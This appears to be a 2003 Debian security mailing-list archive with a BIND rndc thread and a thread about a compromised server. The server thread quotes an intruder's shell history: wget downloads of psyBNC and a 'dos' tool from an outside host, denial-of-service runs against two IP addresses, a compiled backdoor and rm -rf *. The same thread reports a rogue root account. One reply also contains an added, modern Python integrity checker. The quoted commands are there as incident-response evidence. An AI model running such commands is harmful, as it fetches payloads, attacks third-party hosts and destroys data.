On Thursday 18 September 2003 10:45, Adrian von Bidder wrote:

> rndc stops working for me. Anybody else seen this?
>
> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused

(yes, yes,  replying to meself...)

Ok: reason: named now runs as root instead of bind, so it couldn't read the 
rndc.key file. Is this intentional? I was upgrading from current testing.

Another thing: still missing versioned dependency on one of these libraries:
libdns10, libisc7, libisccc0, libisccfg0, liblwres1

(Dunno which one is really necessary, I just upgraded all depends after it 
complained about config file unexpected token delegation-only.)

But all in all, a very very big THANK YOU to LaMont Jones & the ISC for 
'resolving' this problem so quickly. Now I just hope Verislime doesn't start 
to dynamically generate delegations, too...

greets
-- vbi


-- 
precious




Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel

Ralf Dreibrodt wrote:
> Hi,
> 
> Markus Schabel wrote:
> > I've seen some strange things on my (stable with security-updates)
> > server: the last apt-get update didn't work because gzip segfaulted.
> > I've copied gzip from another server over the version on this server,
> > but it also crashed. Interesting was that the executable was bigger
> > after the segfault.
> 
> try the following:
> 
> md5sum /bin/gzip

0abb7d14a76380d67843e5c24cc5bfc3  /bin/gzip

> scp goodserver:/bin/gzip /bin/gzip

NO! Since there's the chance that the server got hacked I'm not
interested to give him other passwords. copied from the other server
via scp.

> md5sum /bin/gzip

8ab687ecd2bef48937b4b08165206a9d  /bin/gzip

> ls /bin/gzip
> md5sum /bin/gzip

0abb7d14a76380d67843e5c24cc5bfc3  /bin/gzip

> can you send the output?
> 
> i had the same problem on a few servers, every file was bigger before
> the ls, but still worked.
> beside gzip, it segfaulted.
> you can also strace ls, normally ls does nothing in /proc, but this ls
> had done anything in /proc.
> 
> But where is it from?
> Have you installed/executed any binaries beside debian-packages?

No. see my other posting, there's quite a lot of info in it...

> Regards,
> Ralf Dreibrodt

thanks markus



Re: Strange segmentation faults and Zombies

2003-09-18 Thread Markus Schabel

Laurent Corbes {Caf'} wrote:
> On Wed, 17 Sep 2003 22:29:58 +0200
> Markus Schabel <[EMAIL PROTECTED]> wrote:
> 
> > I've seen some strange things on my (stable with security-updates)
> > server: the last apt-get update didn't work because gzip segfaulted.
> > I've copied gzip from another server over the version on this server,
> > but it also crashed. Interesting was that the executable was bigger
> > after the segfault.
> 
> curious.
> 
> > In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> > idea where they come from.
> 
> it's the daily cronjob that stole.

yes, and that's reproducible :(

> > You think the server got hacked? Are there any other things that can
> > lead to this? man also behaves strange, it says either "No manual entry
> > for...", "What manual page do you want?" or nothing.
> 
> i'm thinking about a hardware problem. 
> may the harddrive is in failure (get the output of dmesg) or a very big
> ram problem that corrupt files on the hard drive.

request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
ptrace uses obsolete (PF_INET,SOCK_PACKET)
eth0: Promiscuous mode enabled.
device eth0 entered promiscuous mode
eth0: Promiscuous mode enabled.

but nothing about the disks

> in every case simply copy all the data you can and inspect the hdd in
> another box mounting it read only.

setuid.changes lists /dev/* and the following programs:
pppd
postdrop
postqueue
wall
newgrp
at
chage
chfn
chsh
expiry
gpasswd
passwd
write
crontab
dotlockfile
ssh-keysign
procmail
lockfile
popauth
pt_chown
traceroute
mount
umount
login
su
ping
suexec
/usr/lib/mc/bin/cons.saver

and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash

in /etc/.rpn there's a .bash_history with the following content:

>id
>mkdir /etc/.rpn
>ps -aux
>ps -aux | grep tbk
>kill -15292 pid
>kill 15292
>netconf
>locate httpd.conf
>cd /etc/.rpn
>ls -al
>wget
>cd /var/www/cncmap/www/upload/renegade
>ls -al
>rm -rf phpshell.php
>cat bd.c
>gcc -o bd bd.c
>ftp ftp.hpg.com.br
>rm -rf bd.c
>cd /tmp
>cd /etc/.rpn
>wget www.slacks.hpg.com.br/psyBNC.tar.gz
>tar zvxf psyBNC.tar.gz
>tar -zvxf psyBNC.tar.gz
>tar
>gunzip psyBNC.tar.gz
>tar -Acdtrux psyBNC.tar.gz
>tar -x psyBNC.tar.gz
>tar -Acd psyBNC.tar.gz
>tar -cd psyBNC.tar.gz
>tar --help
>pwd
>ls
>rm -rf *
>wget www.slacks.hpg.com.br/bin/dos
>chmod +x dos
>./dos
>./dos 200.101.87.8 65535 8569
>./dos 200.199.95.11 65535 8569

and the executable dos

interesting is the line "tar --help" :D

in "last" I see the following:

>slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11) 200-147-107-35.tlm.dialuol.com.br

IP of the hacker is 200.147.107.35
I think we have no chance of legal actions against .br?

in the directory /var/www/cncmap/www/upload/renegade there are the
following files: backhole.pl
e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
LES-EXPLOIT for Linux x86")
rem.php (phpRemoteView)

so we got hacked :(

what information should we gather before we reinstall the complete
server? I think we have to reinstall the whole thing or do you have
any ideas?

thanks
Markus



Re: Verisign and Bind update

2003-09-18 Thread Lukas Ruf

Adrian von Bidder <[EMAIL PROTECTED]> [2003-09-18 10:48]:

> On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> > ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
> > > Will the package maintainers of BIND be integrating the patches from
> > > ISC-BIND to negate  Verisign's recent shenanigans?
> >
> > Well, it's not only a patch, it's part of bind upstream releases, so yes
> > of course it will eventually be in the packaged version.
> >
> > Actually, there already seems to be a release with this available.
> 
> rndc stops working for me. Anybody else seen this?
> 

have you checked the documentation that comes along with the update?

> [EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
> rndc: connect failed: connection refused
> 

for me, it worked fine after doing the modifications "recommended" in
the short doc.

wbr,
Lukas
-- 
Lukas Ruf   | Wanna know anything about raw IP? |





Re: Verisign and Bind update

2003-09-18 Thread Adrian von Bidder
On Wednesday 17 September 2003 17:26, Ilkka Tuohela wrote:
> ke, 2003-09-17 kello 18:12, James Miller kirjoitti:
> > Will the package maintainers of BIND be integrating the patches from
> > ISC-BIND to negate  Verisign's recent shenanigans?
>
> Well, it's not only a patch, it's part of bind upstream releases, so yes
> of course it will eventually be in the packaged version.
>
> Actually, there already seems to be a release with this available.

rndc stops working for me. Anybody else seen this?

[EMAIL PROTECTED]:/etc/bind# /etc/init.d/bind9 reload
rndc: connect failed: connection refused


cheers
-- vbi

-- 
All bridge hands are equally likely, but some are more equally likely
than others.
-- Alan Truscott




Re: Strange segmentation faults and Zombies

2003-09-18 Thread Ralf Dreibrodt
Hi,

Markus Schabel wrote:
> 
> I've seen some strange things on my (stable with security-updates)
> server: the last apt-get update didn't work because gzip segfaulted.
> I've copied gzip from another server over the version on this server,
> but it also crashed. Interesting was that the executable was bigger
> after the segfault.

try the following:

md5sum /bin/gzip
scp goodserver:/bin/gzip /bin/gzip
md5sum /bin/gzip
ls /bin/gzip
md5sum /bin/gzip

can you send the output?

i had the same problem on a few servers, every file was bigger before
the ls, but still worked.
beside gzip, it segfaulted.
you can also strace ls, normally ls does nothing in /proc, but this ls
had done anything in /proc.

But where is it from?
Have you installed/executed any binaries beside debian-packages?

Regards,
Ralf Dreibrodt
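Ralf's md5sum / scp / ls / md5sum sequence, and the digest Markus saw revert after running ls, generalised into a baseline-and-diff check; this is an added example, not code from the thread. It records size, SHA-256 (instead of md5sum) and the setuid bit per file, so a binary that grew or changed after another program ran, or a file that became setuid in the way Markus's setuid.changes list reports, is flagged. The file names and appended bytes in demo() are constructed.

```python
"""Baseline-and-diff integrity check for a set of binaries (added example)."""
import hashlib
import os
import shutil
import stat
import tempfile
from dataclasses import dataclass


@dataclass(frozen=True)
class Fingerprint:
    size: int
    sha256: str
    setuid: bool


def fingerprint(path: str) -> Fingerprint:
    """Size, SHA-256 and setuid bit of one file."""
    st = os.lstat(path)
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return Fingerprint(st.st_size, digest.hexdigest(),
                       bool(st.st_mode & stat.S_ISUID))


def baseline(paths):
    """Fingerprint every path: the 'before' or 'after' snapshot."""
    return {p: fingerprint(p) for p in paths}


def diff_baseline(before, after):
    """Return {path: reason} for every change a responder should look at.

    A changed digest together with a larger size is reported as such,
    because that is the pattern of a binary that had code appended to it
    (what the thread observed for gzip).
    """
    findings = {}
    for path, old in before.items():
        new = after.get(path)
        if new is None:
            findings[path] = "missing"
            continue
        reasons = []
        if new.sha256 != old.sha256:
            if new.size > old.size:
                reasons.append(f"changed and grew by {new.size - old.size} bytes")
            else:
                reasons.append("changed")
        if new.setuid and not old.setuid:
            reasons.append("became setuid")
        if reasons:
            findings[path] = "; ".join(reasons)
    for path in after:
        if path not in before:
            findings[path] = "new file"
    return findings


def demo():
    """Constructed scenario in a temp dir: a stand-in 'gzip' grows after the
    baseline was taken and a new 'dos' file appears.  Returns reasons keyed
    by file name.  None of these files is a real binary."""
    tmp = tempfile.mkdtemp()
    try:
        ls_path = os.path.join(tmp, "ls")
        gzip_path = os.path.join(tmp, "gzip")
        for p in (ls_path, gzip_path):
            with open(p, "wb") as fh:
                fh.write(b"\x7fELF" + b"\x00" * 60)  # constructed placeholder bytes
        before = baseline([ls_path, gzip_path])

        # Constructed change: 16 bytes appended to 'gzip', mirroring
        # "the executable was bigger after the segfault".
        with open(gzip_path, "ab") as fh:
            fh.write(b"x" * 16)
        dos_path = os.path.join(tmp, "dos")
        with open(dos_path, "wb") as fh:
            fh.write(b"constructed new file")

        after = baseline([ls_path, gzip_path, dos_path])
        return {os.path.basename(p): r
                for p, r in diff_baseline(before, after).items()}
    finally:
        shutil.rmtree(tmp)


if __name__ == "__main__":
    for name, reason in demo().items():
        print(f"{name}: {reason}")
```

Take the baseline from a clean system (or from the known-good copy), not from a box that is already suspect, otherwise the infected file becomes the reference.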



Re: Strange segmentation faults and Zombies

2003-09-18 Thread Christian Storch
Don't forget to try to find the potential hole first!
Otherwise you could have a fast recurrence.

Christian

- Original Message -
From: "Josh Carroll" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Thursday, September 18, 2003 9:12 AM
Subject: Re: Strange segmentation faults and Zombies


> Backup /etc and any other data you have, and you can reference your configuration 
> files later
> during your re-install.
>
> At this point, re-installation is a must. Never delude yourself into thinking you 
> can 'recover'
> from being rooted. Sure, you might be able to do so after a lot of effort/etc, but 
> then again maybe
> you'll forget something and a backdoor will remain. Best bet is to re-install, 
> referencing your
> existing configuration files (though I would NOT use them as-is without inspection, 
> since they
> could potentially have backdoor'd the configs as well).
>
> Good luck.
>
> Josh
>
>
> Markus Schabel ([EMAIL PROTECTED]) wrote:
> > Laurent Corbes {Caf'} wrote:
> > >On Wed, 17 Sep 2003 22:29:58 +0200
> > >Markus Schabel <[EMAIL PROTECTED]> wrote:
> > >
> > >
> > >>I've seen some strange things on my (stable with security-updates)
> > >>server: the last apt-get update didn't work because gzip segfaulted.
> > >>I've copied gzip from another server over the version on this server,
> > >>but it also crashed. Interesting was that the executable was bigger
> > >>after the segfault.
> > >
> > >
> > >curious.
> > >
> > >
> > >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> > >>idea where they come from.
> > >
> > >
> > >it's the daily cronjob that stole.
> >
> > yes, and that's reproducible :(
> >
> > >>You think the server got hacked? Are there any other things that can
> > >>lead to this? man also behaves strange, it says either "No manual entry
> > >>for...", "What manual page do you want?" or nothing.
> > >
> > >
> > >i'm thinking about a hardware problem.
> > >may the harddrive is in failure (get the output of dmesg) or a very big
> > >ram problem that corrupt files on the hard drive.
> >
> > request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> > ptrace uses obsolete (PF_INET,SOCK_PACKET)
> > eth0: Promiscuous mode enabled.
> > device eth0 entered promiscuous mode
> > eth0: Promiscuous mode enabled.
> >
> > but nothing about the disks
> >
> > >in every case simply copy all the data you can and inspect the hdd in
> > >another box mounting it read only.
> >
> > setuid.changes lists /dev/* and the following programs:
> > pppd
> > postdrop
> > postqueue
> > wall
> > newgrp
> > at
> > chage
> > chfn
> > chsh
> > expiry
> > gpasswd
> > passwd
> > write
> > crontab
> > dotlockfile
> > ssh-keysign
> > procmail
> > lockfile
> > popauth
> > pt_chown
> > traceroute
> > mount
> > umount
> > login
> > su
> > ping
> > suexec
> > /usr/lib/mc/bin/cons.saver
> >
> > and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> >
> > in /etc/.rpn there's a .bash_history with the following content:
> >
> > >id
> > >mkdir /etc/.rpn
> > >ps -aux
> > >ps -aux | grep tbk
> > >kill -15292 pid
> > >kill 15292
> > >netconf
> > >locate httpd.conf
> > >cd /etc/.rpn
> > >ls -al
> > >wget
> > >cd /var/www/cncmap/www/upload/renegade
> > >ls -al
> > >rm -rf phpshell.php
> > >cat bd.c
> > >gcc -o bd bd.c
> > >ftp ftp.hpg.com.br
> > >rm -rf bd.c
> > >cd /tmp
> > >cd /etc/.rpn
> > >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> > >tar zvxf psyBNC.tar.gz
> > >tar -zvxf psyBNC.tar.gz
> > >tar
> > >gunzip psyBNC.tar.gz
> > >tar -Acdtrux psyBNC.tar.gz
> > >tar -x psyBNC.tar.gz
> > >tar -Acd psyBNC.tar.gz
> > >tar -cd psyBNC.tar.gz
> > >tar --help
> > >pwd
> > >ls
> > >rm -rf *
> > >wget www.slacks.hpg.com.br/bin/dos
> > >chmod +x dos
> > >./dos
> > >./dos 200.101.87.8 65535 8569
> > >./dos 200.199.95.11 65535 8569
> >
> > and the executable dos
> >
> > interesting is the line "tar --help" :D
> >
> > in "last" I see the following:
> >
> > >slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11) 200-147-107-35.tlm.dialuol.com.br
> >
> > IP of the hacker is 200.147.107.35
> > I think we have no chance of legal actions against .br?
> >
> > in the directory /var/www/cncmap/www/upload/renegade there are the
> > following files: backhole.pl
> > e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003,
> > LES-EXPLOIT for Linux x86")
> > rem.php (phpRemoteView)
> >
> > so we got hacked :(
> >
> > what information should we gather before we reinstall the complete
> > server? I think we have to reinstall the whole thing or do you have
> > any ideas?
> >
> > thanks
> > Markus
> >
> >




